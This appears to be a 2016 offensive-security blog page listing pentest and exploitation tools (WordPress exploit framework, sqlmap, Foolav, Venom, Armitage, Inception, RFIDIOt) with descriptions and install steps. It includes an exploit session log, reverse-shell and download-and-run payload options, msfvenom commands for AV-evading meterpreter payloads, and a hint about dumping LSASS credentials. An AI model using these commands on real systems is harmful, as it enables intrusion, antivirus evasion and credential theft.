Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

Showing posts with label Exploitation Tools.

Thursday, March 17, 2016

Check UNIX/Linux Systems For Privilege Escalation - Climber




Automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation.

Dependencies
  • python >= 2.7
  • python-crypto
  • python-mako
  • python-paramiko

Note

Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH.
https://github.com/knipknap/exscript
This module is already included in Climber sources.



Thursday, March 10, 2016

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems - Wordpress-Exploit-Framework




A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.


What do I need to run it?

Ensure that you have Ruby 2.2.x installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running bundle install.
If bundler is not present on your system, you can install it by running gem install bundler.

How do I use it?

Open a command prompt / terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.
Once loaded, you'll be presented with the wpxf prompt; from here you can search for modules using the search command or load a module using the use command.
Loading a module into your environment will allow you to set options with the set command and view information about the module using info.
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options, and run the exploit against the target.


wpxf > use exploit/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully


For a full list of supported commands, take a look at the project wiki.

What is the difference between auxiliary and exploit modules?

Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.

What payloads are available?
  • bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
  • custom: uploads and executes a custom PHP script.
  • download_exec: downloads and runs a remote executable file.
  • exec: runs a shell command on the remote server and returns the output to the WPXF session.
  • reverse_tcp: uploads a script that will establish a reverse TCP shell.
All these payloads, with the exception of custom, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.

How can I write my own modules and payloads?


Guides on writing modules and payloads can be found on the wiki, and full documentation of the API can be found at http://www.getwpxf.com/doc.




Monday, February 29, 2016

Simple FTP Fuzzer - SFTPfuzzer



SFTPfuzzer (Simple FTP Fuzzer) is a very simple piece of software written in Python 2.7 (by 0x8b30cc) that allows you to easily fuzz the username and password fields of an FTP server, looking for a buffer overflow vulnerability.

SFTPfuzzer is written in a very simple way and the code is well commented, allowing you to easily understand what is going on and edit the software. The code is licensed under the GNU General Public License (GPL v3); if you want to know more, read here.

Usage:

You can use SFTPfuzzer.py in two ways: manual mode and arguments mode.

If you want to enter the target IP address (RHOST) and target port (RPORT) manually, you just need to run:

$ python SFTPfuzzer.py

If you want to add command line arguments, then the usage will be like this:

$ python SFTPfuzzer.py -t <rhost> -p <rport>

For example:

$ python SFTPfuzzer.py -t 192.168.1.8 -p 21



Sunday, February 28, 2016

Automatic SQL Injection And Database Takeover Tool - SQLMap



sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant columns' names contain strings like name and pass.
  • Support to download and upload any file from the file system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the operating system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the operating system underlying the database server. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for escalating the privileges of the database process's user via Metasploit's Meterpreter getsystem command.

Refer to the wiki for an exhaustive breakdown of the features.



Sunday, February 21, 2016

Pentest Tool For Antivirus Evasion and Running Arbitrary Payload on Target Wintel Host - Foolav


The executable compiled from this code is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files, the binary executable and the payload file, into the same directory.


Usage steps
  1. prepare your payload (x86), i.e.
    calc:
    msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf (you don't really need to use an encoder or bad-character blacklisting; it will work anyway)
    meterpreter: msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf
  2. copy the payload file [executable-name-without-exe-extension].mf into the same directory as the executable. The calc.exe payload generated using the above command looks like this (the long \xHH byte string is omitted here):
    # calc.exe [hex-encoded shellcode omitted]
  3. once the executable is run, the payload file will be parsed, loaded into a separate thread and executed in memory.

Hints
  • The x86 binary will run on both x86 and x86_64 Windows systems. Still, you need to use x86 architecture payloads. Nevertheless, an x86 meterpreter payload can be migrated to x86_64 processes. After that, load kiwi will load the x86_64 version, making it possible to access the juicy contents of LSASS process memory :)

  • The .mf payload file can be obfuscated: the parser will ignore every character other than \xHH hexadecimal sequences. This means you can append your payload to almost any file, hide it between the lines or even add your own comments, for example:




Metasploit Shellcode Generator / Compiler / Listenner - Venom



The script uses msfvenom (Metasploit) to generate shellcode in different formats (c | python | ruby | dll | msi | hta-psh), injects the generated shellcode into one function (example: Python; "the Python function will execute the shellcode in RAM") and uses compilers such as gcc (GNU cross compiler), mingw32 or pyinstaller to build the executable file. It also starts a multi-handler to receive the remote connection (reverse shell or meterpreter session).

The 'shellcode generator' tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, powersploit, etc. "P.S. some payloads are undetectable by AV solutions, yes!!!" One of the reasons for that is the use of a function to execute the 2nd stage of the shell/meterpreter directly in the target's RAM.

option  build      target     format          output
1       shellcode  unix       C               C
2       shellcode  windows    C               DLL
3       shellcode  windows    DLL             DLL
4       shellcode  windows    C               PYTHON/EXE
5       shellcode  windows    C               EXE
6       shellcode  windows    MSIEXEC         MSI
7       shellcode  windows    C               RUBY
8       shellcode  windows    POWERSHELL      BAT
9       shellcode  windows    HTA-PSH         HTA
10      shellcode  windows    PSH-CMD         PS1
11      shellcode  windows    PSH-CMD         BAT
12      shellcode  webserver  PHP             PHP
13      shellcode  multi OS   PYTHON(base64)  PYTHON



Thursday, February 18, 2016

Cyber Attack Management Tool - Armitage



Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.







Features

Armitage is a scriptable red team collaboration tool built on top of the Metasploit Framework. Through Armitage, you may launch scans and exploits, get exploit recommendations, and use the advanced features of the Metasploit Framework’s meterpreter. Armitage was originally made for Cyber Defense Exercises, but a lot of penetration testers use Armitage for its collaboration capabilities and its time-saving GUI.

  • Cortana Scripting.
  • Dynamic Workspaces.
  • Graphical User Interface.
  • “Hail Mary” Attack.
  • Red Team Collaboration.


At first glance, it may seem that Armitage is just a pretty front-end on top of Metasploit. That’s not quite true. Armitage is a scriptable red team collaboration tool. It has a server component to allow a team of hackers to share their accesses to compromised hosts.

It’s also possible to write bots that connect to this team server and extend Armitage with scripts written in a language called Cortana. This Cortana piece was funded by DARPA’s Cyber Fast Track program. There’s a lot here.





Installing

Your version of Kali Linux may not include Armitage. To install it, type:

apt-get install armitage

Next, you need to start the Metasploit service. Armitage does not use the Metasploit service, but starting it once will set up a database.yml file for your system. This is a necessary step. You only need to do this once:

service metasploit start
service metasploit stop

Starting

Before you can use Armitage, you must start the postgresql database. This does not happen on boot, so you must run this command each time you restart Kali:

service postgresql start

To start Armitage in Kali Linux, open a terminal and type:

armitage

Armitage will immediately pop up a dialog and ask where you would like to connect to. These parameters only matter if you want to connect to an Armitage team server. Since we’re getting started, we don’t care. Just press Connect.





Next, Armitage will try to connect to the Metasploit Framework. Big surprise, the Metasploit Framework is not running. Armitage will realize this and it will ask you if you would like it to start Metasploit for you. The correct answer is Yes. Press this button and wait.


You will see connection refused messages for up to a few minutes. If this is your first time starting the Metasploit Framework, this may take literally a few minutes. The Metasploit Framework is the largest Ruby codebase out there and it takes time to load all of its modules for the first time. Be patient.

If all went well, you will see a GUI that looks like this:



You’re now ready to use Armitage.








Wednesday, February 10, 2016

FireWire Physical Memory Manipulation - Inception


Inception is a FireWire physical memory manipulation and hacking tool exploiting IEEE 1394 SBP-2 DMA. The tool can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.






Inception aims to provide a stable and easy way of performing intrusive and non-intrusive memory hacks on live computers using FireWire SBP-2 DMA. It is primarily intended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other ways to hack a machine that doesn’t pack encryption. Inception is also useful for incident response teams and digital forensics experts when faced with live machines.


As of version 0.2.2, it is able to unlock Windows 8 SP0, Windows 7 SP0-1, Vista SP0 and SP2, Windows XP SP2-3, Mac OS X Snow Leopard, Lion and Mountain Lion, Ubuntu 11.04, 11.10, 12.04, 12.10, Linux Mint 11, 12 and 13 x86 and x64-bit machines. Signatures are added by request.




Requirements

Inception requires:

Hardware:

  • Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy FireWire interfaces on OS X.
  • Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port.

Software:

  • Python 3
  • git
  • gcc (incl. g++)
  • cmake
  • pip (for automatic resolution of dependencies)
  • libforensic1394
  • msgpack

Installation

On Debian-based distributions the installation command lines can be summarized as:

sudo apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with homebrew:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

git clone git://git.freddie.witherden.org/forensic1394.git
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 setup.py install

Download and install Inception

git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

The setup script should be able to install dependencies if you have pip installed.




RFIDIOt



RFIDIOt is a collection of tools and libraries for exploring RFID technology, written in Python. It currently drives a range of RFID readers made by ACG. It provides support for external (currently Compact Flash/USB/Serial) readers, and functions are provided for standard operations such as READ, WRITE, DEBIT, LOGIN etc. Supported standards are ISO 14443A and ISO 14443B in the 13.56MHz band, and devices include all MIFARE types, SLE 55Rxx, SLE 66CL160S, SLE 66CLX320P, SR176, SRIX4K, Jewel Tag (IRT0302B11 KSW DIY Eng. Sample), Sharp B, ASK GTML2ISO, TOSMART P064. Support for smartcards and other RFID operating frequencies and standards is in the pipeline.

It’s called “RFIDIOt” for two reasons:

1. I like puns. This one stands for “RFID IO tools”.
2. Since I haven’t done any serious programming for a long time, I felt like an idiot having to learn a whole new language and the code probably looks like it’s written by an idiot. However, python rocks, so it was worth it!


It currently drives a range of RFID readers made by ACG, called the HF Dual ISO and HF Multi ISO, which are both 13.56MHz devices, and the LF MultiTag which is 125/134.2kHz. Frosch Hitag reader/writers are also now supported. There’s no reason it couldn’t work with others, these are just the first ones I got my hands on, and since they present themselves to the O/S as standard serial devices without having to install any drivers, it made interfacing very simple (but see the Technical Note section below as I’ve had some issues recently). I have written some example programs to read/write tags and have started on the library routines to handle the data structures of specific tags like MIFARE®. It is far from complete but I thought I’d follow the “publish early, publish often” philosophy on this one…


PC/SC (MUSCLE) devices, such as the Omnikey CardMan, are also supported. I am currently testing with a CardMan 5321.





What standards does it support?

The Dual ISO reader will read (and write) 13.56MHz devices with the following tags: 

  MIFARE® Standard, MIFARE® 4k, MIFARE® Pro, MIFARE® Ultralight, MIFARE® DESFIRE, MIFARE® SmartMX
  SLE 55Rxx, SLE 66CL160S, SLE 66CLX320P, SR176, SRIX4K
  ISO14443A Tags
  ISO14443B Tags
  Jewel Tag (IRT0302B11 KSW DIY Eng. Sample)
  Sharp B
  ASK GTML2ISO
  TOSMART P032/P064

In addition to these, the Multi ISO will also handle ISO 15693, ISO 18000-3, NFC-enabled and ICODE standards, specifically:

  I-CODE SLI (SL2 ICS 20)
  I-CODE EPC (SL2 ICS 10)
  I-CODE UID (SL2 ICS 11)
  I-CODE 
  NFC (Reader To Tag Mode)
  SLE 55Rxx
  SRF55VxxP+S
  SLE 66CL160S
  SLE 66CLX320P
  SR176
  SRIX4K
  LRI 64
  LRI 512
  EM4135
  KSW Temp Sens ®
  Tag-it™ HF-I Standard
  Tag-it™ HF-I Pro
  ASK GTML
  ASK GTML2ISO


The LFX will read/write 125kHz devices with the following tags:

  EM4x02
  EM4x50
  EM4x05 (ISO 11784/5 FDX-B)
  Hitag1
  Hitag2
  HitagS
  Q5
  TI-RFID SYSTEMS 64 bit R/O & R/W
  TI-RFID SYSTEMS 1088 bit Multipage

The Q5 and Hitag2 can be programmed to emulate ‘Unique’ / EM4x02 and FDX-B / EM4x05 standards.

The Frosch will read/write:

  Hitag 1
  Hitag 2
  Hitag S


The Hitag2 can be programmed to emulate ‘Unique’ / EM4x02 and FDX-B / EM4x05 standards.




Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition